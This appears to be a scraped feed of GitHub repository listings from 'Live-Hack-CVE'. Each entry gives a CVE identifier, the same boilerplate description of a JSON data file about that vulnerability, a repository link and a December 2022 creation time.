**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41604 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41604](https://github.com/Live-Hack-CVE/CVE-2022-41604) create time: 2022-12-24T22:06:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37028 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37028](https://github.com/Live-Hack-CVE/CVE-2022-37028) create time: 2022-12-24T22:06:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38699 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38699](https://github.com/Live-Hack-CVE/CVE-2022-38699) create time: 2022-12-24T22:06:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3348 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3348](https://github.com/Live-Hack-CVE/CVE-2022-3348) create time: 2022-12-24T22:05:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30935 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30935](https://github.com/Live-Hack-CVE/CVE-2022-30935) create time: 2022-12-24T22:05:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32170 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32170](https://github.com/Live-Hack-CVE/CVE-2022-32170) create time: 2022-12-24T22:05:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32169 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32169](https://github.com/Live-Hack-CVE/CVE-2022-32169) create time: 2022-12-24T22:05:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39243 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39243](https://github.com/Live-Hack-CVE/CVE-2022-39243) create time: 2022-12-24T22:05:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39219 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39219](https://github.com/Live-Hack-CVE/CVE-2022-39219) create time: 2022-12-24T22:05:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40486 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40486](https://github.com/Live-Hack-CVE/CVE-2022-40486) create time: 2022-12-24T22:05:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3349 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3349](https://github.com/Live-Hack-CVE/CVE-2022-3349) create time: 2022-12-24T22:05:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40785 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40785](https://github.com/Live-Hack-CVE/CVE-2022-40785) create time: 2022-12-24T22:05:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3103 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3103](https://github.com/Live-Hack-CVE/CVE-2022-3103) create time: 2022-12-24T22:05:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39225 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39225](https://github.com/Live-Hack-CVE/CVE-2022-39225) create time: 2022-12-24T22:05:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-1931 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-1931](https://github.com/Live-Hack-CVE/CVE-2015-1931) create time: 2022-12-24T20:43:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5797 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5797](https://github.com/Live-Hack-CVE/CVE-2019-5797) create time: 2022-12-24T20:43:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-0321 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-0321](https://github.com/Live-Hack-CVE/CVE-2019-0321) create time: 2022-12-24T20:38:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-0257 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-0257](https://github.com/Live-Hack-CVE/CVE-2019-0257) create time: 2022-12-24T20:36:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-27249 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-27249](https://github.com/Live-Hack-CVE/CVE-2020-27249) create time: 2022-12-24T20:44:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-27250 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-27250](https://github.com/Live-Hack-CVE/CVE-2020-27250) create time: 2022-12-24T20:44:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28587 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28587](https://github.com/Live-Hack-CVE/CVE-2020-28587) create time: 2022-12-24T20:43:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-13554 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-13554](https://github.com/Live-Hack-CVE/CVE-2020-13554) create time: 2022-12-24T20:43:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-24588 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-24588](https://github.com/Live-Hack-CVE/CVE-2020-24588) create time: 2022-12-24T20:43:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-26139 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-26139](https://github.com/Live-Hack-CVE/CVE-2020-26139) create time: 2022-12-24T20:43:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14591 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14591](https://github.com/Live-Hack-CVE/CVE-2020-14591) create time: 2022-12-24T20:42:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-5540 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-5540](https://github.com/Live-Hack-CVE/CVE-2020-5540) create time: 2022-12-24T20:42:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-16225 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-16225](https://github.com/Live-Hack-CVE/CVE-2020-16225) create time: 2022-12-24T20:42:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-16221 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-16221](https://github.com/Live-Hack-CVE/CVE-2020-16221) create time: 2022-12-24T20:42:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-16219 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-16219](https://github.com/Live-Hack-CVE/CVE-2020-16219) create time: 2022-12-24T20:42:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-16223 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-16223](https://github.com/Live-Hack-CVE/CVE-2020-16223) create time: 2022-12-24T20:42:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-5541 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-5541](https://github.com/Live-Hack-CVE/CVE-2020-5541) create time: 2022-12-24T20:41:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15770 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15770](https://github.com/Live-Hack-CVE/CVE-2020-15770) create time: 2022-12-24T20:41:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15768 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15768](https://github.com/Live-Hack-CVE/CVE-2020-15768) create time: 2022-12-24T20:41:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15774 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15774](https://github.com/Live-Hack-CVE/CVE-2020-15774) create time: 2022-12-24T20:41:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15775 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15775](https://github.com/Live-Hack-CVE/CVE-2020-15775) create time: 2022-12-24T20:41:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15772 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15772](https://github.com/Live-Hack-CVE/CVE-2020-15772) create time: 2022-12-24T20:41:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15776 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15776](https://github.com/Live-Hack-CVE/CVE-2020-15776) create time: 2022-12-24T20:41:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25604 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25604](https://github.com/Live-Hack-CVE/CVE-2020-25604) create time: 2022-12-24T20:41:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25602 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25602](https://github.com/Live-Hack-CVE/CVE-2020-25602) create time: 2022-12-24T20:41:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6280 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6280](https://github.com/Live-Hack-CVE/CVE-2020-6280) create time: 2022-12-24T20:37:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6299 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6299](https://github.com/Live-Hack-CVE/CVE-2020-6299) create time: 2022-12-24T20:37:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6310 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6310](https://github.com/Live-Hack-CVE/CVE-2020-6310) create time: 2022-12-24T20:37:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6275 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6275](https://github.com/Live-Hack-CVE/CVE-2020-6275) create time: 2022-12-24T20:37:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6296 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6296](https://github.com/Live-Hack-CVE/CVE-2020-6296) create time: 2022-12-24T20:37:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6270 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6270](https://github.com/Live-Hack-CVE/CVE-2020-6270) create time: 2022-12-24T20:37:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6240 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6240](https://github.com/Live-Hack-CVE/CVE-2020-6240) create time: 2022-12-24T20:37:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6371 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6371](https://github.com/Live-Hack-CVE/CVE-2020-6371) create time: 2022-12-24T20:37:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-26818 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-26818](https://github.com/Live-Hack-CVE/CVE-2020-26818) create time: 2022-12-24T20:37:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41097 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41097](https://github.com/Live-Hack-CVE/CVE-2021-41097) create time: 2022-12-24T20:45:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-22262 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-22262](https://github.com/Live-Hack-CVE/CVE-2021-22262) create time: 2022-12-24T20:45:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21869 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21869](https://github.com/Live-Hack-CVE/CVE-2021-21869) create time: 2022-12-24T20:44:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-22260 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-22260](https://github.com/Live-Hack-CVE/CVE-2021-22260) create time: 2022-12-24T20:44:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-46021 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-46021](https://github.com/Live-Hack-CVE/CVE-2021-46021) create time: 2022-12-24T20:44:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-46019 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-46019](https://github.com/Live-Hack-CVE/CVE-2021-46019) create time: 2022-12-24T20:44:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-22827 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-22827](https://github.com/Live-Hack-CVE/CVE-2021-22827) create time: 2022-12-24T20:44:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4147 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4147](https://github.com/Live-Hack-CVE/CVE-2021-4147) create time: 2022-12-24T20:44:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-46022 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-46022](https://github.com/Live-Hack-CVE/CVE-2021-46022) create time: 2022-12-24T20:44:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-45444 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-45444](https://github.com/Live-Hack-CVE/CVE-2021-45444) create time: 2022-12-24T20:44:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40419 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40419](https://github.com/Live-Hack-CVE/CVE-2021-40419) create time: 2022-12-24T20:44:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21804 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21804](https://github.com/Live-Hack-CVE/CVE-2021-21804) create time: 2022-12-24T20:44:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21864 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21864](https://github.com/Live-Hack-CVE/CVE-2021-21864) create time: 2022-12-24T20:44:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21803 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21803](https://github.com/Live-Hack-CVE/CVE-2021-21803) create time: 2022-12-24T20:43:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-1382 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-1382](https://github.com/Live-Hack-CVE/CVE-2021-1382) create time: 2022-12-24T20:43:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-30140 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-30140](https://github.com/Live-Hack-CVE/CVE-2021-30140) create time: 2022-12-24T20:43:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21784 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21784](https://github.com/Live-Hack-CVE/CVE-2021-21784) create time: 2022-12-24T20:43:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-32629 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-32629](https://github.com/Live-Hack-CVE/CVE-2021-32629) create time: 2022-12-24T20:43:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21871 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21871](https://github.com/Live-Hack-CVE/CVE-2021-21871) create time: 2022-12-24T20:43:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21794 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21794](https://github.com/Live-Hack-CVE/CVE-2021-21794) create time: 2022-12-24T20:42:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21793 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21793](https://github.com/Live-Hack-CVE/CVE-2021-21793) create time: 2022-12-24T20:42:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21802 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21802](https://github.com/Live-Hack-CVE/CVE-2021-21802) create time: 2022-12-24T20:42:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21801 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21801](https://github.com/Live-Hack-CVE/CVE-2021-21801) create time: 2022-12-24T20:42:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21800 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21800](https://github.com/Live-Hack-CVE/CVE-2021-21800) create time: 2022-12-24T20:42:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21799 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21799](https://github.com/Live-Hack-CVE/CVE-2021-21799) create time: 2022-12-24T20:42:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21866 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21866](https://github.com/Live-Hack-CVE/CVE-2021-21866) create time: 2022-12-24T20:42:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21805 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21805](https://github.com/Live-Hack-CVE/CVE-2021-21805) create time: 2022-12-24T20:42:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21863 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21863](https://github.com/Live-Hack-CVE/CVE-2021-21863) create time: 2022-12-24T20:42:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20771 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20771](https://github.com/Live-Hack-CVE/CVE-2021-20771) create time: 2022-12-24T20:42:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-39146 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-39146](https://github.com/Live-Hack-CVE/CVE-2021-39146) create time: 2022-12-24T20:40:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30330 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30330](https://github.com/Live-Hack-CVE/CVE-2022-30330) create time: 2022-12-24T20:45:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-29413 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-29413](https://github.com/Live-Hack-CVE/CVE-2022-29413) create time: 2022-12-24T20:45:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-29412 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-29412](https://github.com/Live-Hack-CVE/CVE-2022-29412) create time: 2022-12-24T20:45:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-22811 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-22811](https://github.com/Live-Hack-CVE/CVE-2022-22811) create time: 2022-12-24T20:44:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-24577 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-24577](https://github.com/Live-Hack-CVE/CVE-2022-24577) create time: 2022-12-24T20:44:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-24409 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-24409](https://github.com/Live-Hack-CVE/CVE-2022-24409) create time: 2022-12-24T20:44:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-27002 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-27002](https://github.com/Live-Hack-CVE/CVE-2022-27002) create time: 2022-12-24T20:44:18Z

